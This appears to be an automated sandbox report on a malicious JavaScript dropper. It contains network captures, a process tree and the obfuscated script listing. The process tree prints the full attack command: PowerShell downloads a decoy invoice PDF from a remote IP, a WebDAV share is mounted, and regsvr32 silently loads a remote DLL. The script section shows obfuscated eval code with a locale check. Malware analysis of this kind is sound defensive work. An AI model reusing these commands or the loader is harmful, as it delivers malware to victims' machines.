                          Jan 14, 2025 08:56:28.623085022 CET1236INData Raw: 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 48 65 69 67 68 74 20 33 35 30 34 20 2f 49 6e 74 65 72 70 6f 6c 61 74 65 20 74 72 75 65 20 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 2f 57 69 64 74 68
                          Data Ascii: /FlateDecode /Height 3504 /Interpolate true /Subtype /Image /Type /XObject /Width 2479 /Length 634286 >>streamxs-oYfQf|H *Q$oeVUC;"/
                          Jan 14, 2025 08:56:28.623095989 CET1236INData Raw: f1 11 51 2c 6d ea db 09 00 00 00 00 00 00 00 00 c0 4e 98 3a da 60 52 a6 84 c6 d3 a0 6d f7 7c cc 3f 4c 18 d5 49 94 1e 3a b5 a9 6f 30 00 00 00 00 00 00 00 00 00 d3 98 ba d2 60 5a c5 81 50 c9 a0 6d ee fc d8 3c 1e 9a c7 c3 f0 f1 d8 3d 54 15 75 49 94
                          Data Ascii: Q,mN:`Rm|?LI:o0`ZPm<=TuIlq%t>*5gFIt0"%SgL+WB44i<)HlAS+&}CNjD4C;o?4u
                          Jan 14, 2025 08:56:28.623102903 CET1236INData Raw: f4 f0 e6 f0 a0 29 a1 fb 7b d7 7b ef db 0c da 34 d0 cb b7 af d3 63 9e 44 bb 1e fa e1 e6 70 bf 59 96 7b 72 d4 0e 87 b6 27 87 ce 3e 66 37 1c ca a6 dc 5d 34 f5 cd 09 00 00 60 1a 7c b1 04 00 00 00 00 c0 97 64 a3 31 05 3b 2a 1f 43 a3 1d b9 d7 69 47 6e
                          Data Ascii: ){{4cDpY{r'>f7]4`|d1;*CiGn{ZM63\U$CrCM;oN%$)I*oc6vcCB^{}m_v>=wfS=rw7'i_p,`G>0t#
                          Jan 14, 2025 08:56:28.623114109 CET1236INData Raw: 0c bd ef 63 e8 cd cd e3 f5 d5 c3 d5 e5 fd c5 79 13 43 4f 4f 6e 4f 8e 6e 8f 0e 9a 18 fa 41 62 e8 2b 1f 43 73 93 a1 97 6f bb 18 7a bd 3f 8f a1 77 5d 0c bd 68 63 e8 f5 e3 20 86 8e 1d 1b 4a 0c dd b0 a9 6f 4e 00 00 00 d3 e0 8b 25 00 f8 ec ec d4 bf ed
                          Data Ascii: cyCOOnOnAb+Csoz?w]hc JoN%.k#W?6i]5;e)}m{bMC?dbh1xCRcxeSM}s_,gdwY]}-\?'M@Une
                          Jan 14, 2025 08:56:28.623123884 CET1236INData Raw: be 39 01 00 00 4c 83 2f 96 00 60 a7 e4 ee c3 e1 37 de 73 b5 22 0c 16 6b 89 05 e5 0b d0 25 e5 71 65 85 2e b3 44 a4 58 bd 4f d5 5c c6 a2 4f a0 b9 b0 4d 5c d5 86 5e df cd 5d d8 2a 9f 26 b9 27 b9 de e6 9e ae 25 de f6 35 6f b9 f0 9a c3 5f b6 83 af e6
                          Data Ascii: 9L/`7s"k%qe.DXO\OM\^]*&'%5o_&^^O\CS1Cb96tCoN%;_ekZl3<".wU\^]r)5s3~\AV6[E_
                          Jan 14, 2025 08:56:28.623133898 CET776INData Raw: 7f d2 56 b9 b0 ca 60 14 1a 7d 8b d6 64 ac 87 ba a3 39 17 7d ba fc 73 a5 df 57 97 11 f3 ae ab 79 0e fd db 3e f7 59 b0 fa ab 59 7e f3 17 6e 2c f5 2f 62 f9 75 2c bc 94 a3 af e0 12 f7 b7 ca 3b 6d 78 b3 f5 d7 50 7e 36 a6 fe a7 10 80 2f 56 fd 3f 52 f1
                          Data Ascii: V`}d9}sWy>YY~n,/bu,;mxP~6/V?RYJmchs`h'Nm--\hc(n7'iLlG?o9ZLAuI}uV'bF%&0$O-TfWS*ysl]ok:5UDsX|FhI
                          Jan 14, 2025 08:56:28.623143911 CET1236INData Raw: 31 74 38 1c da 3c f2 25 b4 3f 30 34 8a a1 47 12 43 ef bb 18 7a d5 1c 5a ba 68 0c 65 53 ee 06 4c 7d 73 02 00 00 98 06 5f 2c 01 c0 f6 99 7b 0d 0a 31 30 30 30 0d 0a ec 68 17 f0 89 4a 7f 5b fe 6a c8 7c af be 7e 70 a9 d0 0b ca 25 d4 64 50 dd 40 53 e5
                          Data Ascii: 1t8<%?04GCzZheSL}s_,{1000hJ[j|~p%dP@S<88}zJa4"Dsrz4 msJ'9+)sUjcfVr3<r^D)h>c]Gj~l@gs0o{'_M1w/bxvMoHfK0UZv]
                          Jan 14, 2025 08:56:28.623158932 CET224INData Raw: dc 16 eb dc ec f6 e8 ab a9 37 57 e7 7a 68 38 78 ee 33 e8 68 ce 0e 8b a4 e1 5f 41 bf 23 3a 37 e4 9b 7b 41 c3 82 1c 9e e1 6b 6e b6 6b e9 a1 53 ff 63 0a c0 97 63 f5 62 82 1d b5 e8 81 a1 12 43 af ae d2 81 a1 e5 18 7a ad 63 68 c5 43 76 e4 f6 31 74 7f
                          Data Ascii: 7Wzh8x3h_A#:7{AknkSccbCzchCv1tCOO177O1M5`|o>%kP/f#))HMgo_#{k+M$OOzzsHa^r,*Y,,WUB5{i_}
                          Jan 14, 2025 08:56:28.623167992 CET1236INData Raw: 7a e3 71 e1 e9 5a ae 87 96 4b a8 ff 64 d1 2f bd fc 41 16 ca 58 85 25 b4 61 3b 36 25 34 3d 5d f2 5c 99 1f 09 90 9f 0a d0 3f 00 90 de f0 e9 99 cc bd b2 b9 b1 e8 f0 9d 56 de 62 6d 5e 4d ff 7e cb bd 9a d2 67 97 e8 a1 85 a9 f3 f2 1d 4f 17 49 4d ba b6
                          Data Ascii: zqZKd/AX%a;6%4=]\?Vbm^M~gOIM_W;C3Uvj;,C:6<^_7wcICo$*5I}WBm1/yiL}s_,vjaAny!mc=4LdLOJ*H_[?EfW$:
                          Jan 14, 2025 08:56:28.628038883 CET272INData Raw: c3 91 55 fd 7e f3 23 ab 7a 46 5b 5f 92 e4 3f 73 63 a9 39 af 53 8a e4 e8 60 a6 bc 8e 42 cf 66 86 3d 34 dc 78 5c 18 f2 1d 5d 10 ad ef b4 e6 66 9b db 53 2d 3d 94 e1 50 00 db b7 62 2e c1 8e ca 1e 18 1a c5 d0 bb 61 0c bd bc ec 0f 0c 4d 31 f4 e8 f6 f8
                          Data Ascii: U~#zF[_?sc9S`Bf=4x\]fS-=Pb.aM10C~1X\M86ts9L/`f,4;RB?M2iizR+r[&e@SoG~qRJ-&C%*%Ex9rdO_Fnm+8Rc|%


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.849705193.143.1.20588883976C:\Windows\System32\net.exe
                          TimestampBytes transferredDirectionData
                          Jan 14, 2025 08:56:30.404680014 CET107OUTOPTIONS / HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: DavClnt
                          translate: f
                          Host: 193.143.1.205:8888
                          Jan 14, 2025 08:56:31.197123051 CET237INHTTP/1.1 500 Internal Server Error
                          Server: nginx/1.22.1
                          Date: Tue, 14 Jan 2025 07:56:31 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 22
                          Connection: keep-alive
                          X-Content-Type-Options: nosniff
                          Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
                          Data Ascii: Internal server error


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:1
                          Start time:02:56:19
                          Start date:14/01/2025
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2330118683179179335.js"
                          Imagebase:0x7ff687f90000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:2
                          Start time:02:56:20
                          Start date:14/01/2025
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\187452473818653.dll
                          Imagebase:0x7ff65cba0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:02:56:20
                          Start date:14/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:02:56:20
                          Start date:14/01/2025
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
                          Imagebase:0x7ff6cb6b0000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:02:56:28
                          Start date:14/01/2025
                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
                          Imagebase:0x7ff6e8200000
                          File size:5'641'176 bytes
                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:6
                          Start time:02:56:29
                          Start date:14/01/2025
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c net use \\193.143.1.205@8888\davwwwroot\
                          Imagebase:0x7ff65cba0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:02:56:29
                          Start date:14/01/2025
                          Path:C:\Windows\System32\net.exe
                          Wow64 process (32bit):false
                          Commandline:net use \\193.143.1.205@8888\davwwwroot\
                          Imagebase:0x7ff635440000
                          File size:59'904 bytes
                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:02:56:29
                          Start date:14/01/2025
                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                          Imagebase:0x7ff79c940000
                          File size:3'581'912 bytes
                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:9
                          Start time:02:56:29
                          Start date:14/01/2025
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Imagebase:0x7ff67e6d0000
                          File size:55'320 bytes
                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:10
                          Start time:02:56:30
                          Start date:14/01/2025
                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2144 --field-trial-handle=1548,i,11892106457076044815,771019309745034490,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                          Imagebase:0x7ff79c940000
                          File size:3'581'912 bytes
                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:false

                          Call Graph

                          • Executed
                          • Not Executed
                          callgraph clusterC0 clusterC2C0 E1C0 entry:C0 F3C2 pmrjir E1C0->F3C2

                          Script:

                          Code
                          0
                          function pmrjir() {
                          • pmrjir() ➔ undefined
                          1
                          this[jopltxl + qoegyr + piisgmm + piuweynw] ( "xfbhrjly=[1031,3079,5127,4103,2055,3072];var ltnwcvkmp=this[pqpxricd+piisgmm+zmvat+tyqtziv+jopltxl+ebyttknlk+yxsly+ziijnicxr](this[goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr][jcilp+zmvat+jopltxl+piisgmm+ziijnicxr+jopltxl+vbczk+mkyrz+efnjyy+jopltxl+khnvbl+ziijnicxr](goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr+mudeys+awcgmkw+rlzdqzq+jopltxl+piuweynw+piuweynw)[osdnb+jopltxl+tywmlbio+osdnb+jopltxl+piisgmm+ccwhvxr](uyinql+fyitbm+xjbruqw+hctwpcm+tttmnm+jcilp+qbntkblvf+osdnb+osdnb+xjbruqw+njiubjn+efewlh+tttmnm+qbntkblvf+awcgmkw+xjbruqw+osdnb+sgjrenw+jcilp+ngbnq+yxsly+ziijnicxr+zmvat+ngbnq+piuweynw+dfmwzclef+zuqzazlae+piisgmm+yxsly+jopltxl+piuweynw+sgjrenw+ebyttknlk+yxsly+ziijnicxr+jopltxl+zmvat+yxsly+piisgmm+ziijnicxr+nfsnpguoc+ngbnq+yxsly+piisgmm+piuweynw+sgjrenw+rbipuxbpf+ngbnq+khnvbl+piisgmm+piuweynw+jopltxl),16);for(mmrtv=0;mmrtv<xfbhrjly[piuweynw+jopltxl+yxsly+tywmlbio+ziijnicxr+rlzdqzq];++mmrtv){if(ltnwcvkmp==xfbhrjly[mmrtv]){ltnwcvkmp=true;break;}}if(ltnwcvkmp!==true)this[goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr][gwgyp+cufth+nfsnpguoc+ziijnicxr]();this[goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr][jcilp+zmvat+jopltxl+piisgmm+ziijnicxr+jopltxl+vbczk+mkyrz+efnjyy+jopltxl+khnvbl+ziijnicxr](goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr+mudeys+awcgmkw+rlzdqzq+jopltxl+piuweynw+piuweynw)[zmvat+cufth+yxsly](khnvbl+ddyti+ccwhvxr+dfmwzclef+aytbojauw+khnvbl+dfmwzclef+pqpxricd+ngbnq+upmdsclhv+jopltxl+zmvat+tyqtziv+rlzdqzq+jopltxl+piuweynw+piuweynw+mudeys+jopltxl+otxgdfn+jopltxl+dfmwzclef+koqbpxngm+jcilp+ngbnq+ddyti+ddyti+piisgmm+yxsly+ccwhvxr+dfmwzclef+hlciinug+ebyttknlk+yxsly+qoegyr+ngbnq+xgpqmkuur+jopltxl+koqbpxngm+goyxe+jopltxl+mkyrz+osdnb+jopltxl+hpnhjyruq+cufth+jopltxl+tyqtziv+ziijnicxr+dfmwzclef+koqbpxngm+vbczk+cufth+ziijnicxr+wcccxy+nfsnpguoc+piuweynw+jopltxl+dfmwzclef+ljrbitiai+ziijnicxr+jopltxl+ddyti+pqpxricd+ljrbitiai+sgjrenw+nfsnpguoc+yxsly+qoegyr+ngbnq+nfsnpguoc+khnvbl+jopltxl+mudeys+pqpxricd+ccwhvxr+zvtenwt+dfmwzclef+rlzdqzq+ziijnicxr+ziijnicxr+pqpxricd+xsihan+aytbojauw+aytbojauw+ucjfpbj+ugacr+nugbcfv+mudeys+ucjfpbj+eoepyl+nugbcfv+mudeys+ucjfpbj+mudeys+mecnjbtsu+rcjzjvg+xxvjyz+aytbojauw+nfsnpguoc+yxsly+qoegyr+ngbnq+nfsnpguoc+khnvbl+jopltxl+mudeys+pqpxricd+rlzdqzq+pqpxricd+hlciinug+iowgsc+iowgsc+tyqtziv+ziijnicxr+piisgmm+zmvat+ziijnicxr+dfmwzclef+ljrbitiai+ziijnicxr+jopltxl+ddyti+pqpxricd+ljrbitiai+sgjrenw+nfsnpguoc+yxsly+qoegyr+ngbnq+nfsnpguoc+khnvbl+jopltxl+mudeys+pqpxricd+ccwhvxr+zvtenwt+iowgsc+iowgsc+khnvbl+ddyti+ccwhvxr+dfmwzclef+aytbojauw+khnvbl+dfmwzclef+yxsly+jopltxl+ziijnicxr+dfmwzclef+cufth+tyqtziv+jopltxl+dfmwzclef+sgjrenw+sgjrenw+ucjfpbj+ugacr+nugbcfv+mudeys+ucjfpbj+eoepyl+nugbcfv+mudeys+ucjfpbj+mudeys+mecnjbtsu+rcjzjvg+xxvjyz+nkluzxf+zpokujd+zpokujd+zpokujd+zpokujd+sgjrenw+ccwhvxr+piisgmm+qoegyr+upmdsclhv+upmdsclhv+upmdsclhv+zmvat+ngbnq+ngbnq+ziijnicxr+sgjrenw+iowgsc+iowgsc+khnvbl+ddyti+ccwhvxr+dfmwzclef+aytbojauw+khnvbl+dfmwzclef+zmvat+jopltxl+tywmlbio+tyqtziv+qoegyr+zmvat+nugbcfv+mecnjbtsu+dfmwzclef+aytbojauw+tyqtziv+dfmwzclef+sgjrenw+sgjrenw+ucjfpbj+ugacr+nugbcfv+mudeys+ucjfpbj+eoepyl+nugbcfv+mudeys+ucjfpbj+mudeys+mecnjbtsu+rcjzjvg+xxvjyz+nkluzxf+zpokujd+zpokujd+zpokujd+zpokujd+sgjrenw+ccwhvxr+piisgmm+qoegyr+upmdsclhv+upmdsclhv+upmdsclhv+zmvat+ngbnq+ngbnq+ziijnicxr+sgjrenw+ucjfpbj+zpokujd+ipaogw+eoepyl+xxvjyz+mecnjbtsu+eoepyl+ipaogw+nugbcfv+zpokujd+ucjfpbj+zpokujd+ycjkkkpuu+xxvjyz+nugbcfv+mudeys+ccwhvxr+piuweynw+piuweynw,0,false);" );
                          • eval("xfbhrjly=[1031,3079,5127,4103,2055,3072];var ltnwcvkmp=this[pqpxricd+piisgmm+zmvat+tyqtziv+jopltxl+ebyttknlk+yxsly+ziijnicxr](this[goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr][jcilp+zmvat+jopltxl+piisgmm+ziijnicxr+jopltxl+vbczk+mkyrz+efnjyy+jopltxl+khnvbl+ziijnicxr](goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr+mudeys+awcgmkw+rlzdqzq+jopltxl+piuweynw+piuweynw)[osdnb+jopltxl+tywmlbio+osdnb+jopltxl+piisgmm+ccwhvxr](uyinql+fyitbm+xjbruqw+hctwpcm+tttmnm+jcilp+qbntkblvf+osdnb+osdnb+xjbruqw+njiubjn+efewlh+tttmnm+qbntkblvf+awcgmkw+xjbruqw+osdnb+sgjrenw+jcilp+ngbnq+yxsly+ziijnicxr+zmvat+ngbnq+piuweynw+dfmwzclef+zuqzazlae+piisgmm+yxsly+jopltxl+piuweynw+sgjrenw+ebyttknlk+yxsly+ziijnicxr+jopltxl+zmvat+yxsly+piisgmm+ziijnicxr+nfsnpguoc+ngbnq+yxsly+piisgmm+piuweynw+sgjrenw+rbipuxbpf+ngbnq+khnvbl+piisgmm+piuweynw+jopltxl),16);for(mmrtv=0;mmrtv<xfbhrjly[piuweynw+jopltxl+yxsly+tywmlbio+ziijnicxr+rlzdqzq];++mmrtv){if(ltnwcvkmp==xfbhrjly[mmrtv]){ltnwcvkmp=true;break;}}if(ltnwcvkmp!==true)this[goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr][gwgyp+cufth+nfsnpguoc+ziijnicxr]();this[goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr][jcilp+zmvat+jopltxl+piisgmm+ziijnicxr+jopltxl+vbczk+mkyrz+efnjyy+jopltxl+khnvbl+ziijnicxr](goyxe+awcgmkw+khnvbl+zmvat+nfsnpguoc+pqpxricd+ziijnicxr+mudeys+awcgmkw+rlzdqzq+jopltxl+piuweynw+piuweynw)[zmvat+cufth+yxsly](khnvbl+ddyti+ccwhvxr+dfmwzclef+aytbojauw+khnvbl+dfmwzclef+pqpxricd+ngbnq+upmdsclhv+jopltxl+zmvat+tyqtziv+rlzdqzq+jopltxl+piuweynw+piuweynw+mudeys+jopltxl+otxgdfn+jopltxl+dfmwzclef+koqbpxngm+jcilp+ngbnq+ddyti+ddyti+piisgmm+yxsly+ccwhvxr+dfmwzclef+hlciinug+ebyttknlk+yxsly+qoegyr+ngbnq+xgpqmkuur+jopltxl+koqbpxngm+goyxe+jopltxl+mkyrz+osdnb+jopltxl+hpnhjyruq+cufth+jopltxl+tyqtziv+ziijnicxr+dfmwzclef+koqbpxngm+vbczk+cufth+ziijnicxr+wcccxy+nfsnpguoc+piuweynw+jopltxl+dfmwzclef+ljrbitiai+ziijnicxr+jopltxl+ddyti+pqpxricd+ljrbitiai+sgjrenw+nfsnpguoc+yxsly+qoegyr+ngbnq+nfsnpguoc+khnvbl+jopltxl+mudeys+pqpxricd+ccwhvxr+zvtenwt+dfmwzclef+rlzdqzq+ziijnicxr+ziijnicxr+pqpxricd+xsihan+aytbojauw+aytbojauw+ucjfpbj+ugacr+nugbcfv+mudeys+ucjfpbj+eoepyl+nugbcfv+mudeys+ucjfpbj+mudeys+mecnjbtsu+rcjzjvg+xxvjyz+aytbojauw+nfsnpguoc+yxsly+qoegyr+ngbnq+nfsnpguoc+khnvbl+jopltxl+mudeys+pqpxricd+rlzdqzq+pqpxricd+hlciinug+iowgsc+iowgsc+tyqtziv+ziijnicxr+piisgmm+zmvat+ziijnicxr+dfmwzclef+ljrbitiai+ziijnicxr+jopltxl+ddyti+pqpxricd+ljrbitiai+sgjrenw+nfsnpguoc+yxsly+qoegyr+ngbnq+nfsnpguoc+khnvbl+jopltxl+mudeys+pqpxricd+ccwhvxr+zvtenwt+iowgsc+iowgsc+khnvbl+ddyti+ccwhvxr+dfmwzclef+aytbojauw+khnvbl+dfmwzclef+yxsly+jopltxl+ziijnicxr+dfmwzclef+cufth+tyqtziv+jopltxl+dfmwzclef+sgjrenw+sgjrenw+ucjfpbj+ugacr+nugbcfv+mudeys+ucjfpbj+eoepyl+nugbcfv+mudeys+ucjfpbj+mudeys+mecnjbtsu+rcjzjvg+xxvjyz+nkluzxf+zpokujd+zpokujd+zpokujd+zpokujd+sgjrenw+ccwhvxr+piisgmm+qoegyr+upmdsclhv+upmdsclhv+upmdsclhv+zmvat+ngbnq+ngbnq+ziijnicxr+sgjrenw+iowgsc+iowgsc+khnvbl+ddyti+ccwhvxr+dfmwzclef+aytbojauw+khnvbl+dfmwzclef+zmvat+jopltxl+tywmlbio+tyqtziv+qoegyr+zmvat+nugbcfv+mecnjbtsu+dfmwzclef+aytbojauw+tyqtziv+dfmwzclef+sgjrenw+sgjrenw+ucjfpbj+ugacr+nugbcfv+mudeys+ucjfpbj+eoepyl+nugbcfv+mudeys+ucjfpbj+mudeys+mecnjbtsu+rcjzjvg+xxvjyz+nkluzxf+zpokujd+zpokujd+zpokujd+zpokujd+sgjrenw+ccwhvxr+piisgmm+qoegyr+upmdsclhv+upmdsclhv+upmdsclhv+zmvat+ngbnq+ngbnq+ziijnicxr+sgjrenw+ucjfpbj+zpokujd+ipaogw+eoepyl+xxvjyz+mecnjbtsu+eoepyl+ipaogw+nugbcfv+zpokujd+ucjfpbj+zpokujd+ycjkkkpuu+xxvjyz+nugbcfv+mudeys+ccwhvxr+piuweynw+piuweynw,0,false);") ➔ 0
                          2
                          }
                            3
                            koqbpxngm = "A";
                              4
                              koqbpxngm = "q";
                                5
                                koqbpxngm = "u";
                                  6
                                  koqbpxngm = "c";
                                    7
                                    koqbpxngm = "l";
                                      8
                                      koqbpxngm = "q";
                                        9
                                        koqbpxngm = "-";
                                          10
                                          xsihan = "y";
                                            11
                                            xsihan = "m";
                                              12
                                              xsihan = "w";
                                                13
                                                xsihan = "J";
                                                  14
                                                  xsihan = "o";
                                                    15
                                                    xsihan = ":";
                                                      16
                                                      jopltxl = "A";
                                                        17
                                                        jopltxl = "Z";
                                                          18
                                                          jopltxl = "L";
                                                            19
                                                            jopltxl = "f";
                                                              20
                                                              jopltxl = "i";
                                                                21
                                                                jopltxl = "K";
                                                                  22
                                                                  jopltxl = "e";
                                                                    23
                                                                    eoepyl = "Q";
                                                                      24
                                                                      eoepyl = "R";
                                                                        25
                                                                        eoepyl = "b";
                                                                          26
                                                                          eoepyl = "b";
                                                                            27
                                                                            eoepyl = "t";
                                                                              28
                                                                              eoepyl = "e";
                                                                                29
                                                                                eoepyl = "I";
                                                                                  30
                                                                                  eoepyl = "Z";
                                                                                    31
                                                                                    eoepyl = "p";
                                                                                      32
                                                                                      eoepyl = "4";
                                                                                        33
                                                                                        nkluzxf = "R";
                                                                                          34
                                                                                          nkluzxf = "l";
                                                                                            35
                                                                                            nkluzxf = "K";
                                                                                              36
                                                                                              nkluzxf = "r";
                                                                                                37
                                                                                                nkluzxf = "S";
                                                                                                  38
                                                                                                  nkluzxf = "l";
                                                                                                    39
                                                                                                    nkluzxf = "@";
                                                                                                      40
                                                                                                      pqpxricd = "O";
                                                                                                        41
                                                                                                        pqpxricd = "z";
                                                                                                          42
                                                                                                          pqpxricd = "H";
                                                                                                            43
                                                                                                            pqpxricd = "W";
                                                                                                              44
                                                                                                              pqpxricd = "j";
                                                                                                                45
                                                                                                                pqpxricd = "R";
                                                                                                                  46
                                                                                                                  pqpxricd = "p";
                                                                                                                    47
                                                                                                                    yxsly = "Y";
                                                                                                                      48
                                                                                                                      yxsly = "c";
                                                                                                                        49
                                                                                                                        yxsly = "F";
                                                                                                                          50
                                                                                                                          yxsly = "l";
                                                                                                                            51
                                                                                                                            yxsly = "l";
                                                                                                                              52
                                                                                                                              yxsly = "O";
                                                                                                                                53
                                                                                                                                yxsly = "k";
                                                                                                                                  54
                                                                                                                                  yxsly = "k";
                                                                                                                                    55
                                                                                                                                    yxsly = "n";
                                                                                                                                      56
                                                                                                                                      hctwpcm = "G";
                                                                                                                                        57
                                                                                                                                        hctwpcm = "S";
                                                                                                                                          58
                                                                                                                                          hctwpcm = "X";
                                                                                                                                            59
                                                                                                                                            hctwpcm = "d";
                                                                                                                                              60
                                                                                                                                              hctwpcm = "k";
                                                                                                                                                61
                                                                                                                                                hctwpcm = "Z";
                                                                                                                                                  62
                                                                                                                                                  hctwpcm = "l";
                                                                                                                                                    63
                                                                                                                                                    hctwpcm = "r";
                                                                                                                                                      64
                                                                                                                                                      hctwpcm = "Y";
                                                                                                                                                        65
                                                                                                                                                        vbczk = "V";
                                                                                                                                                          66
                                                                                                                                                          vbczk = "A";
                                                                                                                                                            67
                                                                                                                                                            vbczk = "k";
                                                                                                                                                              68
                                                                                                                                                              vbczk = "n";
                                                                                                                                                                69
                                                                                                                                                                vbczk = "f";
                                                                                                                                                                  70
                                                                                                                                                                  vbczk = "A";
                                                                                                                                                                    71
                                                                                                                                                                    vbczk = "D";
                                                                                                                                                                      72
                                                                                                                                                                      vbczk = "K";
                                                                                                                                                                        73
                                                                                                                                                                        vbczk = "O";
                                                                                                                                                                          74
                                                                                                                                                                          hpnhjyruq = "n";
                                                                                                                                                                            75
                                                                                                                                                                            hpnhjyruq = "W";
                                                                                                                                                                              76
                                                                                                                                                                              hpnhjyruq = "f";
                                                                                                                                                                                77
                                                                                                                                                                                hpnhjyruq = "W";
                                                                                                                                                                                  78
                                                                                                                                                                                  hpnhjyruq = "U";
                                                                                                                                                                                    79
                                                                                                                                                                                    hpnhjyruq = "u";
                                                                                                                                                                                      80
                                                                                                                                                                                      hpnhjyruq = "W";
                                                                                                                                                                                        81
                                                                                                                                                                                        hpnhjyruq = "C";
                                                                                                                                                                                          82
                                                                                                                                                                                          hpnhjyruq = "q";
                                                                                                                                                                                            83
                                                                                                                                                                                            mudeys = "O";
                                                                                                                                                                                              84
                                                                                                                                                                                              mudeys = "K";
                                                                                                                                                                                                85
                                                                                                                                                                                                mudeys = "i";
                                                                                                                                                                                                  86
                                                                                                                                                                                                  mudeys = "M";
                                                                                                                                                                                                    87
                                                                                                                                                                                                    mudeys = "p";
                                                                                                                                                                                                      88
                                                                                                                                                                                                      mudeys = ".";
                                                                                                                                                                                                        89
                                                                                                                                                                                                        xjbruqw = "S";
                                                                                                                                                                                                          90
                                                                                                                                                                                                          xjbruqw = "N";
                                                                                                                                                                                                            91
                                                                                                                                                                                                            xjbruqw = "H";
                                                                                                                                                                                                              92
